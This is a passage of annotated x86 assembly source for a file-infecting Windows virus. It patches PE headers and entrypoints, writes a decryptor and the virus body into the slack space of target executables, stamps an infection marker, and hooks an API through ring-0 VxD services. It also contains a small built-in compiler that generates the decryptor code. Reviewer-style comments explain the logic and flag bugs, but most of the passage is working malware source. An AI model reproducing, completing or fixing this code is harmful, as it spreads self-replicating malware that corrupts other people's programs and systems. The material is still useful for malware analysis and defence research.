mov [DataObjectPtr+edi],ecx ; save offset of data object
|
||
push eax
|
||
push ebx
|
||
.if (ecx==edx)
|
||
mov ebx,[PEHeadStart+edi]
|
||
mov eax,[ebx+PE_FileAlign+8] ; file align
|
||
.else
|
||
mov eax,[ecx+Obj_PhysicalSize] ; physical size
|
||
.endif
|
||
|
||
|
||
|
||
|
||
mov ebx,[ecx+Obj_VirtualSize] ; - virtual size
|
||
sub eax,ebx ; = free space
|
||
|
||
mov [SlackInDataSegment+edi],ebx
|
||
|
||
cmp eax,MemorySize*4 ; if this is true we can be
|
||
jg InfectFile ; 'sure' no bug will occure.
|
||
|
||
add eax,ebx ; size of .data segment on
|
||
; disk
|
||
sub eax,MemorySize*4+10 ; some safety
|
||
|
||
pop ebx ; where in file the zero
|
||
add ebx,200h ; slack starts
|
||
sub eax,ebx
|
||
pop eax ; size of slack block
|
||
jc FileFunctionEndAddEsp
|
||
|
||
sub eax,250h+MemorySize*4 ; enough mem free
|
||
jc FileFunctionEndAddEsp ; this method is more risky
|
||
; will bug out if the
|
||
; infected program relies
|
||
; on the data to be cleared
|
||
sub esp,8
|
||
mov [SlackInDataSegment+edi],ebx
|
||
|
||
InfectFile:
|
||
add esp,8
|
||
|
||
mov [LastObjectPtr+edi],edx ; ptr to last object table
|
||
|
||
mov ecx,[PEHeadStart+edi]
|
||
mov edx,[ecx+PE_Entrypoint] ; save old RVA
|
||
mov [OldRVA+edi],edx
|
||
|
||
|
||
mov ecx,[CodeObjectPtr+edi]
|
||
mov ebx,[SlackInCodeSegment+edi]
|
||
|
||
|
||
BreakPoint:
|
||
|
||
mov eax,ebx ; ebx = how far in is free
|
||
; space
|
||
add ebx,[ecx+Obj_VirtualOffset] ; ebx = free space in mem
|
||
|
||
mov edx,[PEHeadStart+edi]
|
||
mov [edx+PE_Entrypoint],ebx ; save new RVA
|
||
|
||
|
||
add eax,[ecx+Obj_PhysicalOffset] ; eax = free space in file
|
||
mov [NewGuideOffset+edi],eax
|
||
|
||
|
||
mov ecx,[DataObjectPtr+edi]
|
||
|
||
mov eax,[ecx+Obj_VirtualOffset] ; data space in mem
|
||
add eax,[SlackInDataSegment+edi] ; free data space in mem
|
||
add eax,(MemorySize-1)*4
|
||
add eax,[edx+PE_ImageBase] ; add with image base
|
||
|
||
mov ecx,MemorySize
|
||
mov ebx,[MemoryTable+edi]
|
||
|
||
mov edx,0ch
|
||
mov [ebx+ecx*4],edx ; used in fs:[0c]
|
||
|
||
sub ebx,4
|
||
|
||
CopyPointersToMem:
|
||
mov [ebx+ecx*4],eax
|
||
sub eax,4
|
||
dec ecx
|
||
jnz CopyPointersToMem
|
||
|
||
add ebx,4
|
||
mov [PointerToDataSlack+edi],ebx
|
||
|
||
|
||
mov ebx,[LastObjectPtr+edi]
|
||
mov eax,[VirtualDataSegment+edi]
|
||
|
||
|
||
mov ecx,[ebx+Obj_VirtualOffset] ; virtual offset
|
||
add ecx,[ebx+Obj_PhysicalSize] ; physical size
|
||
mov edx,[PEHeadStart+edi]
|
||
add ecx,[edx+PE_ImageBase] ; add with imagebase
|
||
|
||
mov [eax+8],ecx ; Decryptor Entrypoint
|
||
|
||
mov edx,[OldRVA+edi]
|
||
mov ebx,[PEHeadStart+edi]
|
||
add edx,[ebx+PE_ImageBase] ; add with image base
|
||
mov [eax],edx ; Program entrypoint
|
||
|
||
mov ebx,[DataObjectPtr+edi]
|
||
mov ecx,[ebx+Obj_VirtualOffset] ; Virtual offset
|
||
add ecx,[SlackInDataSegment+edi] ; Virtual offset of data slack
|
||
mov edx,[PEHeadStart+edi]
|
||
add ecx,[edx+PE_ImageBase] ; add with image base
|
||
|
||
mov [eax+4],ecx
|
||
|
||
mov ecx,[ebx+Obj_PhysicalOffset]
|
||
add ecx,[SlackInDataSegment+edi] ; Physical offset of data slack
|
||
|
||
mov [NewDataSegmentOffset+edi],ecx
|
||
|
||
mov ebx,[LastObjectPtr+edi]
|
||
|
||
mov ecx,[ebx+Obj_PhysicalSize] ; physical size
|
||
add ecx,[ebx+Obj_PhysicalOffset] ; physical offset
|
||
|
||
mov [NewDecryptorOffset+edi],ecx ; Entrypoint in file
|
||
|
||
mov edx,[eax+8] ; decryptor start
|
||
add edx,[DecryptorSize+edi]
|
||
mov [eax+12],edx ; save where to start decrypt
|
||
|
||
|
||
; write Guide
|
||
pushad
|
||
|
||
mov esi,[GuidePos+edi]
|
||
|
||
mov eax,[GuideSize+edi]
|
||
add eax,100
|
||
|
||
; allocate mem for PEHeader
|
||
push eax
|
||
push R0_AllocMem
|
||
call vxd
|
||
pop ecx
|
||
test eax,eax
|
||
jz FileFunctionEndCloseFile
|
||
|
||
mov [TempPtr+edi],eax
|
||
|
||
push edi
|
||
mov ebp,edi
|
||
mov edi,eax
|
||
|
||
call Compile
|
||
pop edi
|
||
|
||
mov edx,[NewGuideOffset+edi] ; write to
|
||
mov ecx,[GuideSize+edi] ; write ecx bytes
|
||
call FileIOWrite
|
||
|
||
mov eax,[TempPtr+edi]
|
||
push eax
|
||
push R0_FreeMem
|
||
call vxd
|
||
pop eax
|
||
|
||
mov esi,[DecryptorPos+edi]
|
||
|
||
mov eax,[DecryptorSize+edi]
|
||
add eax,100
|
||
|
||
; allocate mem for PEHeader
|
||
push eax
|
||
push R0_AllocMem
|
||
call vxd
|
||
pop ecx
|
||
test eax,eax
|
||
jz FileFunctionEndCloseFile
|
||
mov [TempPtr+edi],eax
|
||
|
||
push edi
|
||
mov ebp,edi
|
||
mov edi,eax
|
||
call Compile
|
||
|
||
pop edi
|
||
|
||
; write Decryptor
|
||
mov edx,[NewDecryptorOffset+edi]
|
||
mov ecx,[DecryptorSize+edi]
|
||
|
||
call FileIOWrite
|
||
|
||
mov eax,[TempPtr+edi]
|
||
push eax
|
||
push R0_FreeMem
|
||
call vxd
|
||
pop eax
|
||
|
||
popad
|
||
|
||
mov edx,[NewDataSegmentOffset+edi]
|
||
mov ecx,MemorySize*4
|
||
mov esi,[VirtualDataSegment+edi]
|
||
call FileIOWrite
|
||
|
||
|
||
mov edx,[NewDecryptorOffset+edi]
|
||
add edx,[DecryptorSize+edi]
|
||
mov ecx,VSize
|
||
mov esi,[VirusInRing0Mem+edi]
|
||
call FileIOWrite
|
||
|
||
|
||
mov ebx,VSize
|
||
add ebx,[DecryptorSize+edi]
|
||
|
||
mov esi,[LastObjectPtr+edi]
|
||
mov eax,[esi+Obj_PhysicalSize] ; physical size
|
||
add eax,ebx ; add with new virussize
|
||
add eax,100 ; safety
|
||
|
||
|
||
|
||
mov edx,[PEHeadStart+edi]
|
||
mov ecx,[edx+PE_ObjectAlign] ; object align
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
xor edx,edx
|
||
mul ecx
|
||
|
||
.if eax>[esi+8]
|
||
mov [esi+Obj_VirtualSize],eax ; save new virtual size
|
||
.endif
|
||
|
||
|
||
mov eax,[esi+Obj_PhysicalSize] ; physical size
|
||
add eax,ebx ; add with virus size
|
||
add eax,20 ; safety
|
||
|
||
mov edx,[PEHeadStart+edi]
|
||
mov ecx,[edx+PE_FileAlign] ; file align
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
xor edx,edx
|
||
mul ecx
|
||
|
||
mov [esi+Obj_PhysicalSize],eax ; save new physical size
|
||
|
||
mov eax,'y3k?'
|
||
mov ecx,[PEHeadStart+edi]
|
||
mov [ecx+12],eax
|
||
|
||
mov eax,[LastObjectPtr+edi]
|
||
mov esi,0c0000040h
|
||
mov [eax+Obj_Flags],esi
|
||
|
||
mov eax,[ecx+PE_ImageSize] ; size of image
|
||
add eax,VirusSize ; add with virussize
|
||
mov ecx,[ecx+PE_ObjectAlign] ; object aligment
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
xor edx,edx
|
||
mul ecx ; new size of image in eax
|
||
mov esi,[PEHeadStart+edi]
|
||
mov [esi+PE_ImageSize],eax ; save it
|
||
|
||
mov edx,[PEHeadOfs+edi] ; write to
|
||
mov ecx,[HeaderSize+edi]
|
||
call FileIOWrite
|
||
|
||
FileFunctionEndAddEsp:
; ---- Exit path of the infection routine (the routine's start is above this
; excerpt). Reached by fall-through after the patched PE header has been
; written back to the file; the two labels that follow are the later exits
; that the failure branches above jump to.
; Convention visible throughout this file: edi = relocation base, so every
; global is addressed as [name+edi]; 'vxd' (defined above) dispatches the R0_*
; ring-0 services.
; The label name is historical: there is no 'add esp' here, the call's stack
; is balanced by the explicit pop below.
mov eax,[PEHeadStart+edi]               ; buffer holding the in-memory copy of the PE header
push eax                                ; argument: buffer to release
push R0_FreeMem                         ; service code
call vxd
pop eax                                 ; two dwords pushed, one popped here; 'vxd' evidently removes the other (same pattern as the allocations above)
|
||
|
||
FileFunctionEndCloseFile:
; Close the target file through the virus' own file-I/O wrapper. This is also
; the bail-out target when a ring-0 allocation returns NULL (the 'jz's above),
; so a failed infection still releases the file handle.
mov eax,R0_CLOSEFILE                    ; operation code for FileIOHandle
call FileIOHandle
|
||
|
||
FileFunctionEnd:
; Common exit: clear Flag. It is cleared on every exit path; where it is set
; is above this excerpt (presumably on hook entry, as a busy/re-entry guard -
; confirm against the prologue).
xor eax,eax
mov [edi+Flag], eax
|
||
|
||
CallInOurFunction:
; Pass control through to the hooked (original) API and return to its caller.
; Expected stack on entry (the prologue is above this excerpt; the four pops
; below imply it pushed ebp, edi, esi, ebx in that order):
;   [esp]     saved ebx, esi, edi, ebp
;   then      the hooked caller's return address
;   then      the API's own arguments
mov eax,[edi+OldAPIFunction]            ; eax -> saved pointer to the original API
mov ecx,edi                             ; keep the relocation base in ecx; edi is restored next


pop ebx
pop esi
pop edi
pop ebp

; Pop the caller's return address straight into the 4-byte displacement slot
; of the 'jmp rel32' at the bottom, then convert it into a displacement
; relative to the end of that jmp (ReturnFromHook+4).
; This is self-modifying code: the slot is patched in the virus' own writable
; ring-0 image (see VirusInRing0Mem above), not on the stack.
pop [ReturnFromHook+ecx]
lea edx,[ReturnFromHook+ecx+4]
sub [ReturnFromHook+ecx],edx

; With the return address removed, [esp] is the first API argument - exactly
; what the original API sees once this call pushes its own return address.
; When the original API returns (having removed its arguments itself, if it is
; stdcall; which API is hooked is set above this excerpt) execution falls into
; the jmp below.
call dword ptr [eax]

; E9 xx xx xx xx = jmp rel32 back to the hooked caller; the operand is the slot
; patched above.
; NOTE(review): ReturnFromHook is a single global slot and no locking is
; visible here. If the hooked API is entered again before this jmp executes,
; the earlier return address is overwritten. Whether that can actually happen
; depends on how this hook is scheduled, which this excerpt does not show.
db 0e9h
ReturnFromHook:
dd 0
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
; ------------------------------
|
||
; --------------------- Compiler
|
||
; ------------------------------
|
||
|
||
PointerToRandomMemory equ MemorySize    ; alias of MemorySize (defined above this excerpt)

; Base of the table that 'S<n>' operands index (see GetOperand). Only read
; here; it is initialised to 0 and written somewhere outside this excerpt.
PointerToDataSlack dd 0

; Label table for the compiler: entry n holds the output address recorded by
; 'offset n' (OffsetProc). -1 marks a label not yet seen; the jump handlers do
; not check for it. 10 entries, and OffsetProc does no bounds check.
SavedOffsets dd 10 dup (-1)
|
||
|
||
; Mnemonic lookup table. Each entry is the 4-byte mnemonic constant (the Op_*
; values are defined above this excerpt) that ReadInstruction1 matches with
; 'repnz scasd' after loading the first 4 bytes of a source record and
; byte-swapping them. The order MUST match InstructionTables below: the index
; of the matched entry selects the 8-byte descriptor.
InstructionTable:
dd Op_add                               ; 0  -> AddTable
dd Op_and                               ; 1  -> AndTable
dd Op_cmp                               ; 2  -> CmpTable
dd Op_or                                ; 3  -> OrTable
dd Op_sub                               ; 4  -> SubTable
dd Op_xor                               ; 5  -> XorTable

dd Op_mov                               ; 6  -> MovTable
dd Op_jmp                               ; 7  -> JmpTable

dd Op_jnz                               ; 8  -> JnzTable
dd Op_jnb                               ; 9  -> JnbTable
dd Op_jna                               ; 10 -> JnaTable


dd Op_offset                            ; 11 -> OffsetTable (label definition)
dd Op_db                                ; 12 -> DeclareByteTable (raw bytes)
InstructionTableEnd:
|
||
|
||
InstructionTables:
; One 8-byte descriptor per mnemonic, in InstructionTable order
; (ReadInstruction1 computes descriptor = InstructionTables + index*8):
;   dd handler          procedure jumped to (relocated by ebp)
;   db p0,p1,p2,p3      handler parameters; ebx -> p0 when the handler runs
; For the six ALU mnemonics (handler DefaultProc1, which adds the form code
; 0/1/2 from FetchOpcode to ebx to pick p0/p1/p2):
;   p0  opcode of the r/m,reg form with the d and w bits clear
;       (DefaultProc1 ORs in w=1, SetDirectionBit ORs in d)
;   p1  80h, the group-1 opcode for r/m,imm32 (81h once w is set)
;   p2  the accumulator short form eax,imm32 with w clear (04h -> 05h etc.)
;   p3  the /digit placed in the ModRM reg field of the 81h form
AddTable:
dd DefaultProc1
db 00000000b                            ; 00h  add r/m,reg
db 10000000b                            ; 80h  group 1
db 00000100b                            ; 04h  add eax,imm
db 000b                                 ; /0

AndTable:
dd DefaultProc1
db 00100000b                            ; 20h  and r/m,reg
db 10000000b                            ; 80h
db 00100100b                            ; 24h  and eax,imm
db 100b                                 ; /4

CmpTable:
dd DefaultProc1
db 00111000b                            ; 38h  cmp r/m,reg
db 10000000b                            ; 80h
db 00111100b                            ; 3Ch  cmp eax,imm
db 111b                                 ; /7

OrTable:
dd DefaultProc1
db 00001000b                            ; 08h  or r/m,reg
db 10000000b                            ; 80h
db 00001100b                            ; 0Ch  or eax,imm
db 001b                                 ; /1

SubTable:
dd DefaultProc1
db 00101000b                            ; 28h  sub r/m,reg
db 10000000b                            ; 80h
db 00101100b                            ; 2Ch  sub eax,imm
db 101b                                 ; /5

XorTable:
dd DefaultProc1
db 00110000b                            ; 30h  xor r/m,reg
db 10000000b                            ; 80h
db 00110100b                            ; 34h  xor eax,imm
db 110b                                 ; /6

; mov (handler MoveProc): p0 88h mov r/m,reg (89h with w); p1 C6h mov r/m,imm
; (C7h with w); p2 B8h mov r32,imm32 - MoveProc ORs the register number into
; its low 3 bits; p3 /0 for the C7h form.
MovTable:
dd MoveProc
db 10001000b                            ; 88h
db 11000110b                            ; C6h
db 10111000b                            ; B8h
db 000b                                 ; /0


; jmp: no parameter bytes are used.
JmpTable:
dd JmpProc
dd 0


; Conditional jumps: p0 = the 4-bit Intel condition code that JxxProc ORs into
; 70h (short) or 0F 80h (near); p1..p3 only pad the descriptor to 8 bytes.
JnzTable:
dd JxxProc
db 0101b                                ; cc 5 = NE/NZ -> 75h / 0F 85h
db 0,0,0

JnbTable:
dd JxxProc
db 0011b                                ; cc 3 = NB/AE -> 73h / 0F 83h
db 0,0,0

JnaTable:
dd JxxProc
db 0110b                                ; cc 6 = NA/BE -> 76h / 0F 86h
db 0,0,0



; Pseudo-instructions: 'offset <digit>' records a label position, 'db' copies
; raw bytes to the output. No parameter bytes.
OffsetTable:
dd OffsetProc
dd 0

DeclareByteTable:
dd DeclareByteProc
dd 0
|
||
|
||
|
||
|
||
|
||
|
||
|
||
; Operand scratch filled by ReadOperands: value and type of the first
; (destination) operand and of the second. Type codes come from GetOperand:
;   0   immediate                (value = the 32-bit constant)
;   4   register                 (value = index into RegistersBitValue)
;   8   memory, absolute address (value = the address)
;   12  memory through register  (value = register index)
ToValue dd 0
ToTypeOfValue dd 0

SecondValue dd 0
SecondTypeOfValue dd 0




; Assembly buffer for the instruction currently being built (12 bytes) and
; the number of bytes used so far. Compile resets the first dword and the
; length before each instruction; OutputInstruction copies the used bytes out.
Instruction dd 0,0,0
InstructionLength dd 0
|
||
|
||
|
||
; Map from the 'R<n>' register index used by the source language to the 3-bit
; register number used in ModRM / opcode fields. Index 0 holds 0 (which
; encodes the same as eax); there is no entry for ebp.
RegistersBitValue:
dd 0                                    ; index 0
IntelEax dd 000b                        ; R1
IntelEbx dd 011b                        ; R2
IntelEcx dd 001b                        ; R3
IntelEdx dd 010b                        ; R4
IntelEsi dd 110b                        ; R5
IntelEdi dd 111b                        ; R6
IntelEsp dd 100b                        ; R7 - note 100 as r/m with mod=00 means SIB follows; FixAddresses does not special-case it
|
||
|
||
|
||
; ReadInstruction1 - fetch the next source record, look up its mnemonic and
; jump to the matching handler.
; In:  esi -> inside, or 16 bytes before, the next 16-byte source record
;      edi -> output position; ebp = relocation base
; Out: jumps to the handler with ebx -> the descriptor's parameter bytes,
;      esi -> first operand byte (4 bytes past the record start), edi/ebp
;      preserved. When no mnemonic matches, leaves to CompileEnd instead - this
;      is how a source program terminates. Because Compile enters here with
;      'call', the handler's own 'ret' returns into Compile's loop.
ReadInstruction1:
push edi
lea edi,[InstructionTable+ebp]

mov ecx,(InstructionTableEnd-InstructionTable)/4+1 ; entries + 1, so a hit on the last entry still leaves ecx != 0
add esi,16
and esi,0fffffff0h                      ; round up to the next 16-byte record (Compile pre-biases esi by -16)

lodsd                                   ; 4-byte mnemonic
bswap eax                               ; the source stores it in the opposite byte order to the Op_* constants

push edi
repnz scasd                             ; edi -> one past the matching entry; ecx = 0 when nothing matched

sub edi,[esp]                           ; (index+1)*4

shl edi,1                               ; (index+1)*8: descriptors are 8 bytes

lea ebx,[edi+4-8+InstructionTables+ebp] ; ebx -> parameter bytes of descriptor[index]

mov eax,[ebx-4]                         ; unrelocated handler address
add eax,ebp                             ; relocate
pop edi                                 ; drop the saved table address
pop edi                                 ; restore the output pointer

test ecx,ecx
jz CompileEnd                           ; no match - the scan ran off the table: end of program

jmp eax                                 ; tail-dispatch to the handler
|
||
|
||
|
||
|
||
|
||
|
||
; ReadOperands - parse "op1[,op2]" at esi into the To*/Second* scratch fields.
; In:  esi -> first operand.  Out: esi -> past the operands.
; Clobbers eax, ebx, ecx, edx. When there is no comma the Second* fields keep
; whatever the previous instruction left in them.
ReadOperands:
call GetOperand
mov [ToValue+ebp],eax
mov [ToTypeOfValue+ebp],ebx

mov al,byte ptr [esi]
cmp al,','
jnz Return                              ; single operand: done
inc esi

call GetOperand
mov [SecondValue+ebp],eax
mov [SecondTypeOfValue+ebp],ebx
ret
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
; SetDirectionBit - set bit 1 (the Intel 'd' bit) of the opcode byte in
; Instruction when the destination's type code is lower than the source's,
; i.e. the destination is the register side and the r/m side is the source
; (d=1: reg <- r/m). Uses the signed compare from WhatOperandIsRegMem, which
; also zeroes ebx. Clobbers eax, ebx.
SetDirectionBit:
call WhatOperandIsRegMem
setl bl                                 ; 1 when ToType < SecondType
shl ebx,1                               ; -> bit 1

or [Instruction+ebp],ebx
ret
|
||
|
||
|
||
; GetOther / GetRegMem - select one of the two parsed operands by type code.
; The operand with the HIGHER type code (memory 8/12 > register 4 > immediate
; 0) is treated as the r/m operand; the other one goes into the reg field or
; is the immediate. On a tie (e.g. reg,reg) GetRegMem returns the first
; (destination) operand and GetOther the second.
; Out: eax = value, ebx = type of the selected operand.
GetOther:
call WhatOperandIsRegMem
jnl Label40                             ; ToType >= SecondType: the second operand is "other"

mov eax,[ToValue+ebp]
mov ebx,[ToTypeOfValue+ebp]
ret

GetRegMem:
call WhatOperandIsRegMem
jl Label40                              ; ToType < SecondType: the second operand is r/m

mov eax,[ToValue+ebp]
mov ebx,[ToTypeOfValue+ebp]
ret

Label40:
mov eax,[SecondValue+ebp]
mov ebx,[SecondTypeOfValue+ebp]
ret
|
||
|
||
|
||
; Instruction forms returned by FetchOpcode. DefaultProc1Label1 also adds the
; value to the descriptor pointer, so it doubles as the index of the parameter
; byte (p0/p1/p2) that holds the opcode for that form.
RegMem_Reg equ 0                        ; r/m,reg or reg,r/m
RegMem_Immediate equ 1                  ; r/m,imm32 (group-1 80h/81h with /digit)
Eax_Immediate equ 2                     ; eax,imm32 accumulator short form
|
||
|
||
|
||
; FetchOpcode - classify the parsed operand pair.
; Out: eax = RegMem_Reg (0)       when the non-r/m operand is a register
;            RegMem_Immediate (1) when it is an immediate
;            Eax_Immediate (2)    when it is an immediate AND the r/m operand
;                                 is the direct register with index 1 (eax)
; Clobbers ebx, ecx.
FetchOpcode:
call GetRegMem

cmp ebx,4
setz bl                                 ; bl = 1: r/m operand is a direct register
cmp eax,1
setz al                                 ; al = 1: its index is 1 (eax); both eax and ebx are small so the upper bytes are 0
and eax,ebx
mov ecx,eax                             ; ecx = 1 only for the eax,imm candidate

call GetOther
xor eax,eax
test ebx,ebx
jnz Return                              ; the other operand is a register: form 0

inc eax
add eax,ecx                             ; 1, or 2 when the accumulator short form applies
ret
|
||
|
||
|
||
|
||
|
||
; WhatOperandIsRegMem - compare the two operand type codes.
; Out: flags from 'cmp ToType,SecondType' (callers use the signed forms
;      jl/jnl/setl: "less" = first operand's type < second's),
;      eax = ToTypeOfValue, ebx = 0 (callers build a bit into it).
WhatOperandIsRegMem:
xor ebx,ebx
mov eax,[ToTypeOfValue+ebp]
cmp eax,[SecondTypeOfValue+ebp]
ret
|
||
|
||
; FixAddresses - append the ModRM byte (plus disp32 and/or imm32 as needed) to
; the instruction being built. Called once the opcode byte(s) are in place.
; In:  Instruction/InstructionLength, the To*/Second* operands. For the
;      r/m,imm form the /digit has already been ORed into the ModRM slot by
;      DefaultProc1, which is why that path ORs rather than stores the byte.
; Out: Instruction complete, InstructionLength updated. Clobbers eax,ebx,ecx,edx.
; Encodings produced for the r/m operand:
;   direct register   mod=11, r/m=reg
;   [register]        mod=00, r/m=reg  (r/m=100 would need a SIB byte; nothing
;                     here special-cases it - whether R7/esp can reach this
;                     path is not visible in this excerpt)
;   absolute address  mod=00, r/m=101, disp32
FixAddresses:
lea edx,[Instruction+ebp]
add edx,[InstructionLength+ebp]         ; edx -> the ModRM slot


call GetRegMem                          ; eax/ebx = the r/m operand
xor ecx,ecx
cmp ebx,8
setl cl                                 ; 1 for a direct register (type 4)
imul ecx,ecx,3
shl ecx,6                               ; mod = 11 (register) or 00 (memory)

cmp ebx,8
jz MemoryValue

mov eax,[eax*4+RegistersBitValue+ebp]   ; register number -> r/m field

or ecx,eax
jmp Label43



MemoryValue:
or ecx,101b                             ; mod=00 r/m=101: disp32 follows
mov [edx+1],eax                         ; the absolute address
add [InstructionLength+ebp],4

Label43:
inc [InstructionLength+ebp]             ; the ModRM byte itself

call GetOther                           ; eax/ebx = the non-r/m operand
test ebx,ebx
jz LastOperandIsImmediate
mov eax,[eax*4+RegistersBitValue+ebp]   ; register number -> reg field (bits 5:3)
shl eax,3
or ecx,eax

mov byte ptr [edx],cl                   ; reg,r/m form: ModRM stored outright
ret

LastOperandIsImmediate:
push edx
lea edx,[Instruction+ebp]
add edx,[InstructionLength+ebp]
mov [edx],eax                           ; imm32 goes after ModRM (and after the disp32, if any)
add [InstructionLength+ebp],4
pop edx

or byte ptr [edx],cl                    ; merge with the /digit already in the reg field
ret
|
||
|
||
; OutputInstruction - copy the InstructionLength bytes built in Instruction to
; the output at edi, advancing edi. Preserves esi; clobbers ecx.
OutputInstruction:
push esi
lea esi,[Instruction+ebp]
mov ecx,[InstructionLength+ebp]
rep movsb
pop esi
ret
|
||
|
||
|
||
; Compile - translate a source program (16-byte records: a 4-byte mnemonic
; followed by binary operands, see GetOperand) into x86 machine code.
; input
; Edi -> where to put compiled code
; Esi -> code to compile. The first record is expected to be 16-byte aligned;
;        esi is biased by -16 so ReadInstruction1's round-up lands on it.
; Ebp  = relocation base used for every data reference in the compiler

; return
; eax = size of the compiled code in bytes (edi on exit minus edi on entry)
; edi -> one past the last emitted byte
; ebx = whatever the last handler left; not a meaningful result
; NOTE(review): the previous header said "eax = where to put compiled code,
; ebx = size"; the code at CompileEnd computes eax = edi - start. The callers
; in the infection routine above ignore the return value and use
; GuideSize/DecryptorSize instead.
; Termination: ReadInstruction1 jumps to CompileEnd when a record's mnemonic
; matches nothing, so any unrecognised 4 bytes end the program. A 0C3h (ret)
; byte is written at the current output position after every instruction and
; is not counted in the size, so the buffer always ends with a ret (the
; callers allocate 100 extra bytes for this).
Compile:
push edi                                ; remember the output start
sub esi,16

CompileAgain:
mov [Instruction+ebp],0                 ; only the first dword of the 12-byte buffer is cleared
mov [InstructionLength+ebp],0
call ReadInstruction1                   ; dispatches to a handler; the handler's ret comes back here
mov al,0c3h
mov byte ptr [edi],al                   ; provisional 'ret' after the last instruction; overwritten by the next one
jmp CompileAgain

CompileEnd:
pop esi                                 ; return address of 'call ReadInstruction1' (we arrive here by jz from inside it)
pop esi                                 ; the saved output start
mov eax,edi
sub eax,esi                             ; eax = bytes emitted
ret
|
||
|
||
|
||
|
||
; OffsetProc - handler for 'offset <d>': record the current output address as
; label <d> (one ASCII digit) in SavedOffsets, for later backward jumps.
; No bounds check: a non-digit byte indexes outside the 10-entry table.
OffsetProc:
call AsciiToNum
mov [SavedOffsets+ebp+eax*4],edi
ret
|
||
|
||
; DeclareByteProc - handler for 'db': one count byte followed by that many raw
; bytes, copied verbatim from the source record to the output.
; The count is not checked against the 16-byte record size; ReadInstruction1
; simply rounds esi up afterwards, so data that spills into the next record
; makes that record be skipped.
DeclareByteProc:
xor eax,eax
lodsb                                   ; count
mov ecx,eax
rep movsb
ret
|
||
|
||
; MoveProc - handler for 'mov'. Descriptor bytes: p0=88h, p1=C6h, p2=B8h, p3=0.
; Forms:
;   reg,r/m / r/m,reg   -> DefaultProc1's generic path (89h/8Bh + ModRM)
;   [abs],imm32         -> DefaultProc1's group path: C7h /0 disp32 imm32
;   reg,imm32           -> B8h+reg imm32 (5 bytes), built here
; NOTE(review): only type 8 (absolute address) is routed to the C7h path. A
; bracketed register destination ([R<n>],imm, type 12) would take the B8h+reg
; path below and be emitted as a plain register load. Whether the source
; programs ever use that form is not visible in this excerpt.
MoveProc:
push ebx                                ; descriptor pointer; popped at DefaultProc1Label1 or below
call ReadOperands
call SetDirectionBit
call FetchOpcode

test eax,eax
jz DefaultProc1Label1                   ; RegMem_Reg: generic ModRM path
call GetRegMem
mov ecx,eax                             ; destination register index
mov eax,1                               ; RegMem_Immediate, for the group path
cmp ebx,8
jz DefaultProc1Label1                   ; memory destination: C6h/C7h group path

mov eax,[ecx*4+RegistersBitValue+ebp]   ; register number
lea edx,[Instruction+ebp]
pop ebx
or al,byte ptr [ebx+2]                  ; B8h | reg

mov [edx],eax                           ; opcode byte (the upper bytes are 0 and are overwritten by the imm32 next)

call GetOther                           ; eax = imm32
mov [edx+1],eax
mov [InstructionLength+ebp],5
jmp OutputInstruction
|
||
|
||
|
||
|
||
; DefaultProc1 - handler for the six group-1 ALU mnemonics
; (add/and/cmp/or/sub/xor).
; In:  ebx -> descriptor parameter bytes p0..p3 (see InstructionTables),
;      esi -> operands. Emits the instruction via OutputInstruction.
; DefaultProc1Label1 is also the shared tail entered from MoveProc, with the
; descriptor pointer still pushed and eax = form (0 or 1).
DefaultProc1:
push ebx
call ReadOperands
call SetDirectionBit                    ; d bit into Instruction byte 0
call FetchOpcode                        ; eax = form 0/1/2

DefaultProc1Label1:
pop ebx
add ebx,eax                             ; ebx -> the parameter byte for this form (p0/p1/p2)

movzx ecx,byte ptr [ebx]
inc ecx                                 ; set the w bit: 32-bit operands

dec eax
jnz Label41                             ; not the r/m,imm form
mov ch,byte ptr [ebx+2]                 ; ebx was advanced by 1, so this is p3 = the /digit
shl ch,3                                ; into the reg field of the ModRM slot (Instruction byte 1)

Label41:

or [Instruction+ebp],ecx                ; opcode (and /digit) merged with the d bit already there
inc [InstructionLength+ebp]

dec eax
jz CopyDataToInstruction                ; form 2: accumulator short form, no ModRM

call FixAddresses                       ; forms 0 and 1: ModRM (+disp32) (+imm32)
jmp OutputInstruction

CopyDataToInstruction:
call GetOther                           ; eax = the imm32
lea ebx,[Instruction+ebp]
add ebx,[InstructionLength+ebp]
mov [ebx],eax
add [InstructionLength+ebp],4
jmp OutputInstruction
|
||
|
||
|
||
;-JMP-------Jump
;Near,8-bit |1|1|1|0|1|0|1|1| 8-bit Displacement
;Near,Direct |1|1|1|0|1|0|0|1| Full Displacement
;Near,Indirect |1|1|1|1|1|1|1|1| |mod|1|0|0| R/M |


; JmpProc - handler for 'jmp'. Two paths; note that the label names are the
; reverse of the Intel terms in the table above:
;   register operand (type != 0): emits FFh, 20h|reg, i.e. mod=00 /4 - the
;     memory-INDIRECT 'jmp dword ptr [reg]'. A bare register (type 4) is
;     encoded the same way; a type-8 operand would use its address as an
;     index into RegistersBitValue.
;   numeric operand (type 0), labelled "JumpIsIndirect": a DIRECT relative
;     jump to a SavedOffsets entry. Only the 2-byte short form exists, and it
;     is used only when the target lies within -4..+3 bytes of the current
;     output position; otherwise nothing at all is emitted (the final 'ret'),
;     i.e. E9 rel32 is not implemented.
; NOTE(review): the short path falls into OutPutSmallJump, which ORs edx into
; 70h. This procedure never sets edx, and GetOperand leaves it 0 for a numeric
; operand, so the byte written is 70h (jo rel8) rather than EBh (jmp rel8).
; The 'xor ecx,ecx' below is not used by anything that follows.
JmpProc:
call GetOperand
xor ecx,ecx

test ebx,ebx
jz JumpIsIndirect

mov ebx,[eax*4+RegistersBitValue+ebp]   ; register number

mov al,0ffh
stosb

mov eax,ebx
or eax,00100000b                        ; ModRM: mod=00, /4, r/m=reg
stosb
ret

JumpIsIndirect:
mov ebx,[SavedOffsets+ebp+eax]          ; unscaled: eax must already be a byte offset (OffsetProc stores at n*4)
sub ebx,edi

add ebx,4                               ; ebx = target - edi + 4

test ebx,0fffffff8h
jz OutPutSmallJump                      ; only when 0 <= ebx <= 7

ret                                     ; out of range: no code emitted
|
||
|
||
|
||
; JxxProc - handler for the conditional jumps (jnz/jnb/jna). p0 = the 4-bit
; condition code. Operand: a numeric label index into SavedOffsets (read
; unscaled, like JumpIsIndirect). Emits 7x rel8 when the target lies within
